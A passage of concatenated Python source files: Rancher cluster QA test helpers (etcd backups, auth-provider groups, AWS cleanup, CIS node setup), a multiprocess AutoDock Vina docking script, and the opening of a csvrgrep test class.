etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": "80"}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
while True and socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
create a webscoket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-multinode-nlb',
resource_prefix + '-k3s-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-multinode-db"
print("deleting the database: {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
record_name = resource_prefix + ".qa.rancher.space."
print("deleting the route53 record: {}".format(record_name))
AmazonWebServices().delete_route_53_record(record_name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
# the workloads under System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
|
pydock.py
|
#!/usr/bin/env python
import sys
import os
import numpy as np
from multiprocessing import Manager
from multiprocessing import Process
from multiprocessing import Queue
import subprocess
import argparse
import pandas as pd
from pdbtools import ligand_tools
class DockingVina(object):
"""
python module for Vina
"""
def __init__(self, docking_params):
"""
Construction Docking object
put parameters with dictionary
docking_params['vina_program']
docking_params['dock_config_file']
docking_params['output_save']
docking_params['gen3d_dir']
docking_params['dock_dir']
docking_params['num_sub_proc']
docking_params['timeout_gen3d']
docking_params['timeout_dock']
docking_params['tlen']
docking_params['pout']
"""
self.vina_program = docking_params['vina_program']
self.num_sub_proc = docking_params['num_sub_proc']
self.timeout_gen3d = docking_params['timeout_gen3d']
self.timeout_dock = docking_params['timeout_dock']
self.neutralize = docking_params['neutralize']
self.pH = docking_params['pH']
self.dock_config_file = docking_params['dock_config_file']
self.output_save = docking_params['output_save']
if self.output_save:
self.tlen = docking_params['tlen']
self.pout = docking_params['pout']
self.gen3d_dir = docking_params['gen3d_dir']
if not os.path.exists(self.gen3d_dir):
try:
os.makedirs(self.gen3d_dir)
except FileExistsError as e:
print(e, flush=True)
self.dock_dir = docking_params['dock_dir']
if not os.path.exists(self.dock_dir):
try:
os.makedirs(self.dock_dir)
except FileExistsError as e:
print(e, flush=True)
self.use_my_module = docking_params['use_my_module']
if self.use_my_module:
my_module_path = docking_params['my_module_path']
my_module_dir = os.path.dirname(my_module_path)
sys.path.append(my_module_dir)
import my_module
self.my_class = my_module.my_class
self.my_class.__init__(self, docking_params)
self.rescoring = docking_params['rescoring']
self.rescoring_program = docking_params['rescoring_program']
self.rescoring_config_file = docking_params['rescoring_config_file']
def docking(self, ligand_file, docking_pdbqt_file, docking_log_file):
"""
run_docking program using subprocess
input :
ligand_file
docking_pdbqt_file
output :
affinity list for a input molecule
"""
run_line = '%s' % self.vina_program
run_line += ' --config %s' % self.dock_config_file
run_line += ' --ligand %s' % ligand_file
run_line += ' --out %s' % docking_pdbqt_file
if self.output_save:
run_line += ' --log %s' % (docking_log_file)
e = None
try:
result = subprocess.check_output(run_line.split(),
stderr=subprocess.STDOUT,
timeout=self.timeout_dock,
universal_newlines=True)
except Exception as e:
return [99.999], e
result_lines = result.split('\n')
check_result = False
affinity_list = list()
for result_line in result_lines:
if result_line.startswith('-----+'):
check_result = True
continue
if not check_result:
continue
if result_line.startswith('Writing output'):
break
if result_line.startswith('Refine time'):
break
lis = result_line.strip().split()
if not lis[0].isdigit():
break
# mode = int(lis[0])
affinity = float(lis[1])
affinity_list += [affinity]
if len(affinity_list) == 0:
e = 'WARNING: Could not find any conformations.'
return [99.999], e
return affinity_list, e
def docking_score_only(self, ligand_file):
"""
run docking program with score_only using subprocess
input :
ligand_file
output :
affinity list for a input molecule
"""
run_line = '%s' % self.rescoring_program
run_line += ' --config %s' % self.rescoring_config_file
run_line += ' --ligand %s' % ligand_file
run_line += ' --score_only'
e = None
try:
result = subprocess.check_output(run_line.split(),
stderr=subprocess.STDOUT,
timeout=self.timeout_dock,
universal_newlines=True)
except Exception as e:
return [99.999], e
result_lines = result.split('\n')
# weight_list = list()
# check_weight = False
affinity_list = list()
for result_line in result_lines:
# if result_line.startswith('Weights'):
# check_weight = True
# continue
# if check_weight:
# lis = result_line.strip().split()
# if len(lis) <2:
# check_weight = False
# continue
# weight_list += [[float(lis[0]), lis[1]]]
# continue
if result_line.startswith('Affinity:'):
lis = result_line.strip().split()
affinity = float(lis[1])
affinity_list += [affinity]
if len(affinity_list) == 0:
return [99.999], e
return affinity_list, e
def creator(self, q, data, num_sub_proc):
"""
put data to queue
input: queue
data = [(idx1, molid1, smi1), (idx2, molid2, smi2), ...]
num_sub_proc (for end signal)
"""
for d in data:
idx = d[0]
q.put((idx, d[1]))
for i in range(0, num_sub_proc):
q.put('DONE')
def simulation_process(self, idx, mol_id, smi, pid):
result_dict = dict()
if self.neutralize or (self.pH is not None):
smi_p = ligand_tools.ligand_preparation(smi, self.neutralize,
self.pH)
else:
smi_p = smi
if not self.output_save:
ligand_pdb_file = '%s/ligand_%d.pdb' % (self.gen3d_dir, pid)
ligand_pdbqt_file = '%s/ligand_%s.pdbqt' % (self.gen3d_dir, pid)
docking_pdbqt_file = '%s/dock_%d.pdbqt' % (
self.dock_dir, pid)
docking_log_file = '%s/dock_%d.log' % (self.dock_dir, pid)
docking_pdb_file = '%s/dock_%s.pdb' % (self.dock_dir, pid)
out_dock_dir1 = None
else:
mol_id2 = mol_id[0:self.tlen]
out_gen3d_dir1 = self.gen3d_dir + "/" + mol_id2
if not os.path.exists(out_gen3d_dir1):
try:
os.makedirs(out_gen3d_dir1)
except FileExistsError as e:
print(e, flush=True)
ligand_pdb_file = '%s/ligand_%s.pdb' % (out_gen3d_dir1, mol_id)
ligand_pdbqt_file = '%s/ligand_%s.pdbqt' % (out_gen3d_dir1, mol_id)
out_dock_dir1 = self.dock_dir + "/" + mol_id2
if not os.path.exists(out_dock_dir1):
try:
os.makedirs(out_dock_dir1)
except FileExistsError as e:
print(e, flush=True)
docking_pdbqt_file = '%s/dock_%s.pdbqt' % (out_dock_dir1, mol_id)
docking_pdb_file = '%s/dock_%s.pdb' % (out_dock_dir1, mol_id)
docking_log_file = '%s/dock_%s.log' % (out_dock_dir1, mol_id)
e = ligand_tools.gen_3d(smi_p, ligand_pdb_file,
timeout=self.timeout_gen3d)
if e is not None:
e2 = ligand_tools.gen_3d(smi_p, ligand_pdb_file,
timeout=self.timeout_gen3d)
if e2 is not None:
print(e2, 'gen_3d', idx, mol_id, smi_p, flush=True)
docking_score = np.array([99.999], dtype=np.float32)
result_dict['docking'] = docking_score
return result_dict
e = ligand_tools.pdb_to_pdbqt(ligand_pdb_file, ligand_pdbqt_file)
if e is not None:
print(e, 'pdb_to_pdbqt', idx, mol_id, smi_p, flush=True)
docking_score = np.array([99.999], dtype=np.float32)
result_dict['docking'] = docking_score
return result_dict
docking_score, e = self.docking(ligand_pdbqt_file, docking_pdbqt_file,
docking_log_file)
docking_score = np.array(docking_score, dtype=np.float32)
if e is not None:
docking_score = [99.999]
result_dict['docking'] = docking_score
print(e, 'docking', idx, mol_id, smi_p, flush=True)
return result_dict
result_dict['docking'] = docking_score
if self.output_save or self.rescoring or self.use_my_module:
ligand_tools.pdbqt_to_pdb_ref(
docking_pdbqt_file, docking_pdb_file, ligand_pdb_file)
if self.rescoring:
docking_rescore, e = self.docking_score_only(docking_pdb_file)
docking_rescore = np.array(docking_rescore, dtype=np.float32)
if e is not None:
docking_rescore = np.array([99.999], dtype=np.float32)
print(e, 're-scoring', idx, mol_id, smi_p, flush=True)
result_dict['docking_re'] = docking_rescore
if self.use_my_module:
self.my_class.simulation_process(self, idx, mol_id, smi, smi_p,
pid, out_dock_dir1,
docking_pdb_file, result_dict)
return result_dict
def worker(self, q, return_dict):
"""
generate subprocess for docking
input
q (queue)
return_dict
"""
pid = os.getpid()
while True:
qqq = q.get()
if qqq == 'DONE':
# print('proc =', os.getpid())
break
(idx, d) = qqq
mol_id = d[0]
smi = d[1]
# print screening processing in every pout step
if self.pout != 0:
if idx % self.pout == self.pout-1:
print("processing: ", idx+1, flush=True)
result_dict = self.simulation_process(idx, mol_id, smi, pid)
return_dict[idx] = result_dict
def predict(self, smiles_list):
"""
input SMILES list
output result_dict
result_dict include affinity list (and other scores)
corresponding to the SMILES list
if docking is fail, docking score is [99.999]
"""
data = list(enumerate(smiles_list))
num_data = len(data)
num_sub_proc = min(self.num_sub_proc, num_data)
q1 = Queue()
manager = Manager()
return_dict = manager.dict()
proc_master = Process(target=self.creator,
args=(q1, data, num_sub_proc))
proc_master.start()
# create slave process
procs = []
for sub_id in range(0, num_sub_proc):
proc = Process(target=self.worker, args=(q1, return_dict))
procs.append(proc)
proc.start()
q1.close()
q1.join_thread()
proc_master.join()
for proc in procs:
proc.join()
keys = sorted(return_dict.keys())
result_dict = dict()
docking_score_list = list()
if self.rescoring:
docking_re_list = list()
for key in range(num_data):
if key in keys:
result_dict0 = return_dict[key]
if 'docking' in result_dict0:
docking_score = result_dict0['docking']
else:
docking_score = np.array([99.999], dtype=np.float32)
if self.rescoring:
if 'docking_re' in result_dict0:
docking_re = result_dict0['docking_re']
else:
docking_re = np.array([99.999], dtype=np.float32)
else:
docking_score = np.array([99.999], dtype=np.float32)
if self.rescoring:
docking_re = np.array([99.999], dtype=np.float32)
docking_score_list += [docking_score]
if self.rescoring:
docking_re_list += [docking_re]
result_dict['docking'] = docking_score_list
if self.rescoring:
result_dict['docking_re'] = docking_re_list
if self.use_my_module:
self.my_class.predict(self, smiles_list, result_dict, return_dict)
return result_dict
class LoadFromConfig(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
with values as f:
parser.parse_args(f.read().split(), namespace)
class ExtendAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
items = getattr(namespace, self.dest) or []
items.extend(values)
setattr(namespace, self.dest, items)
def parser_arg(parser):
# vina parameter
parser.register('action', 'extend', ExtendAction)
parser.add_argument('--arg_file', type=open, required=False, default=None,
action=LoadFromConfig, help='argment file')
parser.add_argument('--dock_config', type=str, required=False,
default=None, help='docking config file ')
parser.add_argument('-v', '--vina_program', type=str, required=False,
default='qvina02',
help='select vina, qvina02, or smina')
parser.add_argument('--my_module', type=str, required=False,
default=None,
help='set user python module path (for pifinder)')
parser.add_argument('--neutralize', action='store_true',
required=False, help='neutralize smiles ')
parser.add_argument('--pH', type=float, default=None,
required=False, help='protonate state for pH 7.4 ')
parser.add_argument('--output_save', action='store_true', required=False,
help='default output pdbqt is temp file ')
parser.add_argument('--gen3d_dir', type=str, required=False, default='tmp',
help='3d initial conformation directory')
parser.add_argument('--dock_dir', type=str, required=False,
default='tmp', help='binding conformation directory')
parser.add_argument('--num_sub_proc', type=int, required=False,
default=10, help=' --num_sub_proc 10')
parser.add_argument('--timeout_gen3d', type=int, required=False,
default=1, help=' --timeout_gen3d 1')
parser.add_argument('--timeout_dock', type=int, required=False,
default=120, help=' --timeout_dock 120')
parser.add_argument('--tlen', type=int, default='7', required=False,
help='lenth of sub directory name, default: 7')
parser.add_argument('--pout', type=int, default='0', required=False,
help='print processing out: 0 or number, default: 0')
parser.add_argument('--rescoring_program', type=str, required=False,
default='smina', help='smina path')
parser.add_argument('--rescoring_config', type=str, required=False,
default=None, help='docking config file for rescoring')
return
def arg_to_params(parser):
use_my_module = False
for i, m in enumerate(sys.argv):
if m == '--my_module':
my_module_path = sys.argv[i+1]
use_my_module = True
my_module_dir = os.path.dirname(my_module_path)
sys.path.append(my_module_dir)
import my_module
my_module.parser_arg(parser)
args = parser.parse_args()
vina_program = args.vina_program
num_sub_proc = args.num_sub_proc
timeout_gen3d = args.timeout_gen3d
timeout_dock = args.timeout_dock
output_save = args.output_save
gen3d_dir = args.gen3d_dir
dock_dir = args.dock_dir
dock_config_file = args.dock_config
tlen = args.tlen
pout = args.pout
neutralize = args.neutralize
pH = args.pH
rescoring = False
rescoring_config_file = args.rescoring_config
rescoring_program = args.rescoring_program
if rescoring_config_file is not None:
rescoring = True
docking_params = dict()
docking_params['vina_program'] = vina_program
docking_params['gen3d_dir'] = gen3d_dir
docking_params['dock_dir'] = dock_dir
docking_params['num_sub_proc'] = num_sub_proc
docking_params['timeout_gen3d'] = timeout_gen3d
docking_params['timeout_dock'] = timeout_dock
docking_params['output_save'] = output_save
docking_params['tlen'] = tlen
docking_params['pout'] = pout
docking_params['neutralize'] = neutralize
docking_params['pH'] = pH
docking_params['dock_config_file'] = dock_config_file
docking_params['rescoring'] = rescoring
docking_params['rescoring_program'] = rescoring_program
docking_params['rescoring_config_file'] = rescoring_config_file
my_module_path = args.my_module
docking_params['use_my_module'] = use_my_module
docking_params['my_module_path'] = my_module_path
if use_my_module:
docking_params = my_module.arg_to_params(parser, docking_params)
return args, docking_params
def main():
parser = argparse.ArgumentParser(description='docking with multi process')
parser.add_argument('-l', '--ligand_list_file', type=str, required=False,
default='smiles.txt',
help=' --ligand_list_file smiles.txt')
parser.add_argument('-o', '--output_file', type=str, required=False,
default='docking.txt',
help=' --output_file docking.txt')
parser_arg(parser)
args, docking_params = arg_to_params(parser)
ligand_list_file = args.ligand_list_file
output_file = args.output_file
if len(sys.argv) < 2:
parser.print_usage()
sys.exit()
if args.dock_config is None:
parser.print_usage()
print('dock_config is missing')
sys.exit()
ligand_file_format = ligand_list_file.strip().split('.')[-1]
if ligand_file_format == 'txt':
field_separator = '\s+'
elif ligand_file_format == 'csv':
field_separator = ','
elif ligand_file_format == 'tsv':
field_separator = '\t'
else:
field_separator = None
if ligand_file_format == 'pkl':
df = pd.read_pickle(ligand_list_file)
else:
df = pd.read_csv(ligand_list_file, sep=field_separator)
# num_data = df.shape[0]
fkey = df.keys()[0]
if fkey.startswith('#'):
df.rename(columns={fkey: fkey[1:]}, inplace=True)
smiles_list = df[['MOL_ID', 'SMILES']].values.tolist()
# smiles_list = smiles_list[0:10]
docking_vina = DockingVina(docking_params)
result_dict = docking_vina.predict(smiles_list)
docking_score_list = result_dict['docking']
docking_min = [x[0] for x in docking_score_list]
df['Docking1'] = docking_min
df['Docking'] = docking_score_list
if docking_params['rescoring']:
rescoring = result_dict['docking_re']
df['Docking_re'] = rescoring
use_my_module = docking_params['use_my_module']
my_module_path = docking_params['my_module_path']
if use_my_module:
my_module_dir = os.path.dirname(my_module_path)
sys.path.append(my_module_dir)
import my_module
my_module.my_score_to_df(df, docking_params, result_dict)
sep = field_separator
if sep == '\s+':
sep = ' '
if output_file.strip().split('.')[-1] == 'pkl':
df.to_pickle(output_file)
else:
df.to_csv(output_file, sep=sep, float_format='%.3f', index=False)
if __name__ == "__main__":
main()
|
_do_not_test_csvrgrep.py
|
"""
csvrgrep is in experimental status
"""
import contextlib
from io import StringIO
import sys
from tests.mk import (
CmkTestCase,
ColumnsTests,
EmptyFileTests,
NamesTests,
patch,
skiptest,
)
from csvmedkit.xutils.csvrgrep import CSVRgrep, launch_new_instance
from csvmedkit.exceptions import *
# i.e. as opposed to `csvrgrep`; CLI_PATH is used since csvrgrep is not an entry point
CLI_PATH = "./csvmedkit/xutils/csvrgrep.py"
class TestCSVRgrep(CmkTestCase, EmptyFileTests, ColumnsTests, NamesTests):
Utility = CSVRgrep
default_args = [
r"\d",
"examples/dummy.csv",
]
columns_args = [
r"\d+",
]
def test_launch_new_instance(self):
with patch.object(
sys,
"argv",
[self.Utility.__name__.lower()] + self.default_args
# + ["examples/dummy.csv"],
):
launch_new_instance()
def test_skip_lines(self):
self.assertRows(
[
"--skip-lines",
"3",
"-c",
"a,b",
